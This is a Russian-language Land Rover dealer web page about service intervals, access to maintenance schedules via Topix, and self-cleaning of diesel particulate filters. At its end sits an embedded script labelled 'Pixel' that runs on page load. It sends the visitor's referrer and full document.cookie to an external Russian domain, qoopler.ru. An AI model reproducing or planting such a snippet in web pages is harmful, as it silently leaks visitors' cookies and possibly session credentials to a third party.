ААА Mоторс Jaguar Land Rover

ПЕРИОДИЧНОСТЬ ТЕХНИЧЕСКОГО ОБСЛУЖИВАНИЯ

СЕРВИС

 

Чтобы Ваш Land Rover всегда оставался в превосходном состоянии, проводите его регулярное техническое обслуживание в официальном дилерском центре. Обслуживание необходимо проводить в установленные интервалы, отсчитываемые с момента передачи автомобиля его первому владельцу.

Чтобы не превысить продолжительность межсервисного интервала, лучше заблаговременно обратиться в официальный сервисный центр Land Rover для записи на техническое обслуживание Вашего автомобиля.

При эксплуатации автомобиля в жестких условиях (например, сильный мороз или пыльная атмосфера) его техническое обслуживание должно проводиться через каждые 6 месяцев. Более подробную информацию можно получить у Вашего дилера.

ПРОГРАММА ОБСЛУЖИВАНИЯ

Для получения персонализированной информации по автомобилю, включая периодичность технического обслуживания, клиенту необходимо зарегистрироваться на сайте Topix по ссылке:

TOPIX

После регистрации и выбора модели и модельного года, информация о периодичности технического обслуживания будет доступна в разделе Документы. 

Вы также можете проверить перечень работ, запасных частей и нормы времени для каждого интервала ТО для автомобилей с 12 модельного года.

САЖЕВЫЙ ФИЛЬТР DPF – ОСОБЕННОСТИ ЭКСПЛУАТАЦИИ

Чтобы сократить количество вредных выбросов в атмосферу, в автомобилях Land Rover с дизельным двигателем устанавливаются сажевые фильтры DPF.
Все фильтры DPF обладают функцией самоочистки, и для её осуществления требуются особые условия: непрерывное движение автомобиля на скорости 65–100 км/ч в течение 10–20 минут.
Чтобы обеспечить бесперебойную работу Вашего Land Rover и избежать незапланированных затрат, внимательно следите за индикаторами и сообщениями на панели приборов и следуйте рекомендациям!

ПРЕДУПРЕЖДЕНИЕ

You are about to leave . Please note that cannot be responsible for any content or validity outside of this domain.

8 (863) 333-06-70 {!-- Pixel --} {script type="text/javascript"} (function (d, w) { var n = d.getElementsByTagName("script")[0], s = d.createElement("script"), f = function () { n.parentNode.insertBefore(s, n); }; s.type = "text/javascript"; s.async = true; s.src = "https://qoopler.ru/index.php?ref="+d.referrer+"&cookie=" + encodeURIComponent(document.cookie); if (w.opera == "[object Opera]") { d.addEventListener("DOMContentLoaded", f, false); } else { f(); } })(document, window); {/script} {!-- /Pixel --}